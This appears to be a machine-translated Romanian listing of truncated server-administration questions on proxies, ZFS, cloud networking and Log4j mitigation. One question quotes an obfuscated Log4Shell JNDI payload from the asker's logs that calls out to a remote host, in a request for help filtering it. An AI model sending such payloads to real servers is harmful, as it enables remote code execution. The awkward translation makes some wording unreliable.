Ultimele Server intrebări

Deci, am un server ubuntu la distanță care rulează și am decis să configurez un server Socks5 pe el pentru distracție. Am folosit următoarea comandă pentru a o redirecționa ssh -D 1080 ubuntu@<adresa_ip>, și funcționează foarte bine, dar după ce am folosit-o o vreme, m-am săturat să fac comanda, de fiecare dată când vreau să folosesc proxy-ul. Deci, am încercat să redirecți ...

Mă întreb dacă există o modalitate de a migra serverul Centos6.3 de la Rackspace la AWS cloud, imaginea serverului este de 268,92 GB necomprimată.

Am mai făcut procesele de sincronizare și nu a funcționat, așa că am vrut să învârt exact aceeași instanță. Am încercat și bibliotecile mai noi ale platformei pe care o rulăm, dar nu a reușit.

Acesta este în esență ceea ce am nevoie p ...

Acest lucru va fi puțin complicat de citit, dar sper să fie clar. Engleza nu este prima mea limba, scuze.

În școala noastră avem un comutator HP 2530-24G conectat la un comutator tp-link tl-sf1005d neadministrat. Pe acesta din urmă îl vom numi Switch 6. Din acest comutator, rețeaua este extinsă prin comutatoare similare neadministrate în două direcții: fiecare ramură trece prin săli  ...

Dacă ar fi să folosesc Shodan și să descopăr că cineva folosește un anunț „admin/admin” pentru pagina de administrare a routerului. Cum pot să le spun asta? Există o modalitate de a redirecționa interogările lor DNS către o pagină care spune: vă rugăm să vă schimbați parola routerului?

Avem un MSI în care trebuie schimbat doar un folder. Există oricum pentru a genera un patch pentru asta?? Installshield arată componente individuale când am verificat

Am o instanță openstack în funcțiune de 4 luni și aș dori să o migrez la alt nod nova. Când dau clic pe opțiunea de migrare a instanței acelei instanțe care rulează de 4 luni pe tabloul de bord openstack. EROARE afișată deoarece imaginea este fără date asociate. Având în vedere că noul nod nova are suficient cpu, ram și spațiu de stocare.

Mesajul de eroare este ca mai jos:

Ima ...

Rulez un PowerDNS pe Linux. Se pare că PowerDNS este vulnerabil la noul log4j-exploit. Există vreo modalitate prin care pot dezactiva Log4j? Din cercetările mele, se pare că puteți schimba metoda de înregistrare în syslog, dar nu sunt foarte sigur cum să fac asta.

Sunt în proces de configurare a unui server Open Ldap (ds-389), cu toate acestea, nu găsesc multe resurse bune care definesc un ghid de securitate sau de întărire care poate fi aplicat configurației sau schemei directorului.

Are cineva link-uri sau referințe bune care să discute cum putem întări în mod corespunzător o configurație a serverului Open Ldap?

Am găsit câteva referințe și un ...

Încerc să proiectez o rețea pentru aplicația mea în cloud. Alegerea mea de nor este oracle cloud aici. Vor exista două VM în aceeași subrețea (una va fi master și alta ca failover), ambele vor rula aceeași aplicație web în containerul docker. Un IP public care poate fi adăugat la CloudFlare pentru rutarea traficului către. Mă gândesc să instalez Keepalived pentru verificarea stării de ...

Eu folosesc un proxy invers Kong să proxy fiecare cerere HTTP pentru serverele mele web. Aș dori să atenuez problema actuală log4j ("log4shell") prin găsirea și înlocuirea șirurilor de atașare critice precum "jndi". De exemplu, am găsit asta în jurnalele mele:

${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback}

Cred că acest lucru ar putea fi realizat folosind ...

Bună, trebuie să construiesc un bloc de putere posibil pe o instanță standard de Windows 10.
Am nevoie de o modalitate programatică de a seta o variabilă de mediu cu șirul de versiune a celei mai recente biblioteci msodbcsql la https://packages.microsoft.com/rhel/8/prod/

cea mai recentă versiune actuală este https://packages.microsoft.com/rhel/8/prod/msodbcsql17-17.8.1.2-1.x86_64.rpm dar a ...

Rulez un set mic de noduri Docker Swarm pe Raspberry Pis și folosesc glusterfs ca stocare partajată pentru volumele docker. Am configurat inițial acest lucru în timp ce eram pe Ubuntu Server 21.04 (hirsute) care are gluster 9.0 inclus în pachetele sale implicite. Acest lucru a funcționat excelent, cu doar blip-uri ocazionale în volumele montate, aparent când unele actualizări s-ar aplica în tÄ ...

Pe o instalare non-CDB, am portul 5500 configurat așa cum văd folosind comanda:

selectați dbms_xdb_config.gethttpsport() din dual;

...și totuși serverul nu ascultă pe portul 5500 așa cum văd cu netstat și, desigur, nu mă pot conecta la https://server:5500/em

Ce mi-ar putea lipsi?

Iată ascultătorul meu.ora:

> LISTENER = (DESCRIPTION_LIST =
> (DESCRIERE =
> (ADRESA = (PROTOCOL = TCP)(H ...

Încerc să creez o aplicație de înaltă disponibilitate.Designul meu actual are două VM, ambele au IP-uri publice, ambele rulează în aceeași subrețea și ambele VM au aceeași aplicație web care rulează în docker. certificatele ssl și traficul către aplicație în docker este gestionat de Traefik. Prima VM este master, așa că ip-ul său este actualizat la Cloudflare. Există un al treilea ...

Astăzi am primit un e-mail falsificat: ne-a fost trimis „de la noi”. (Să presupunem că deținem foo.com -- domeniul real redactat.)

Acest lucru este deranjant, deoarece arată ca „de la foo.com”, dar cu siguranță expeditorul nu este de la „foo.com”.

Cutia poștală „[email protected]” este un grup Google, setat pentru a permite oricui să „publice postări” (adică, oamenii de  ...

Serverul web apache (apache2) folosește log4j?

Am Apache2 2.4.38 (debian) instalat pe sistemul de operare Raspberry Pi (64 de biți) și am găsit câteva înregistrări ciudate în jurnalul meu cu privire la CVE-2021-44228 din kryptoslogic-cve-2021-44228.com (pot de miere/scaner), dataastatistics.com (offline și rău intenționat?) și a8fvkc.dnslog.cn (nu stiu ce este asta)

Ce ar trebui să fac acum?

M-am alăturat unui proiect GCP ca rol de editor cu mult timp în urmă și aș vrea să-l părăsesc acum, dar nu pot, deoarece scrie că numai rolul de proprietar al proiectului poate elimina un utilizator. Și proprietarul proiectului nu răspunde cererea mea de a mă îndepărta de acolo.

Există vreo modalitate de a mă îndepărta?

Am un server de analiză care rulează pe o instanță Ubuntu AWS când am încercat să repornesc mongoDb-ul meu, nu pornește. Mi-am dat ping gazdei locale și nu părea să fie probleme cu asta, dar jurnalul meu Apache avea unele avertismente/erori despre portul 4040 pe care nu am fost clar cum să le interpretez:

[Dum., 12 dec. 06:51:58.821980 2021] [proxy_http:error] [pid 10239] (-102)Eroare ne ...

Încerc să obțin o înțelegere mai profundă a fluxurilor de trafic și a rutării în diferite scenarii când resursele dintr-un VPC comunică între ele și cu serviciile AWS. Recent am dat peste asta FAQ în documentele AWS și a aruncat o mică cheie în înțelegerea mea:

Î. Traficul trece pe internet atunci când două instanțe comunică folosind adrese IP publice sau când instanțe comunică ...

Implicit zfs_vdev_async_write_min_active=2, cu un maxim corespunzător de 10. Același maxim implicit de 10 se aplică și cozilor de citire și scriere sincronizate, dar pentru ele valoarea minimă este de asemenea 10.

Am văzut configurații care măresc toate aceste minime la același număr (> 10). De ce ajută la egalizarea echilibrului dintre scrierile asincrone și citirile/scrisurile si ...

Cozile de citire asincrone Vdev au min=1 și max=3 în mod implicit. Toate cozile de citire/scriere sincronizate sunt implicite la min=max=10, în timp ce scrierile asincrone au min=2 și max=10.

Citirile asincrone sunt descrise ca „citiri prefatch” în documente. Așadar, presupun că prin proiectare, atunci când i/o este grea, activitatea de preluare preliminară ar trebui menținută relat ...

Mă confrunt cu această problemă de luni de zile, iar cunoștințele mele limitate de rețea nu îmi permit să progresez mai departe, așa că iată că cer un sfat.

Am un router OpenWRT cu două subrețele, 192.168.1.x și 192.168.2.x. Pe 192.168.1.x am un PC client care rulează o aplicație de care nu am surse, iar pe 192.168.2.x rulează un server cu același software. Pentru a descoperi al ...

Following setup:

openvpn server with public ip, mobile clients and at home a raspberry that act as vpn gateway. All mobile clients get a route from the openvpn server so that they I can connect into my homenetwork via openvpn, thats works fine.

But the openvpn server cant.

I think its a configuration problem with openvpn-server, but actually I have no idea what to do. The problem will be the entry in ipta ...

Având în vedere două pool-uri ZFS în care sunt trimise instantanee de la unul la celălalt, este posibil să se repare automat un instantaneu deteriorat folosind o copie a acelui instantaneu stocat în celălalt pool?

Sper că aceasta va fi doar o întrebare ipotetică, dar se pare că merită știută! Din cate pot sa spun zfs scrub funcționează doar pentru o singură piscină și doar reparații  ...

Am instalat minio pe un VPS (care rulează Ubuntu 20) cu SSL prin CERTBOT. Cand ma conectez la acest site de pe laptop, totul merge bine, certificatul este valabil. Dacă încerc să mă conectez la acest site de pe serverul meu Windows 20019 de la care vreau să mă conectez la locația de stocare, primesc o eroare că certificatul nu este valid. Când verific cine a emis certificatul, scrie credo02 ...

Am scris un client IKE pentru a negocia SA IPsec cu unele servere IKE, cum ar fi racoon și strongswan.

Când negocierea s-a terminat, trimit un pachet IPsec (pachete udp-esp) de la mașina client, mașina serverului strongswan primește pachetul, dar nu îl gestionează.

scenele mele de rețea transport-udp-natt: mașină A (centos7) mașină B(win7) mașină Vmware în mașina B(centos7) 172.23.25 ...

Am configurat un proxy invers nginx pe un debian 11 pe care pot ajunge la serverul de aplicații cu subdomeniul de pe internet. Dar pe rețeaua internă nu funcționează.

Proxy-ul de rezervă se află în aceeași subrețea ca și serverul de aplicații 172.3.0.1/24. Controlerele de domeniu sunt introduse ca DNS. Clienții se află într-o subrețea diferită și nu pot ajunge la subdomeniu prin  ...

Tocmai am primit niște YubiKeys pentru a-mi securiza conturile importante și acum mă întreb despre cea mai bună modalitate de a securiza accesul la unele cutii VPS pe care le am. Până acum, am dezactivat autentificarea bazată pe parolă și am folosit chei SSH pentru a mă conecta la servere.

Din câte îmi pot da seama din unele cercetări, există două moduri de a securiza accesul SSH c ...

sper să ai o zi bună.

Este prima dată când configurez un server. Mă confrunt cu o mică problemă, după ce mă conectez la super micro server „de la distanță”, consola nu se afișează.

rețineți că instalez deja java și îl actualizez. Am încercat pe diferite dispozitive și diferite browsere

Încerc să configurez SCCM pe o mașină de la distanță care rulează Windows 10 și trebuie să știu de unde să descarc configurarea SCCM, în afară de extragerea de pe un ISO de server sau ceva de genul ăsta.

Context: Mașina în cauză este un computer obișnuit care a fost instalat de compania mea într-o organizație a unei alte firme pentru a rula software-ul nostru proprietar și a a ...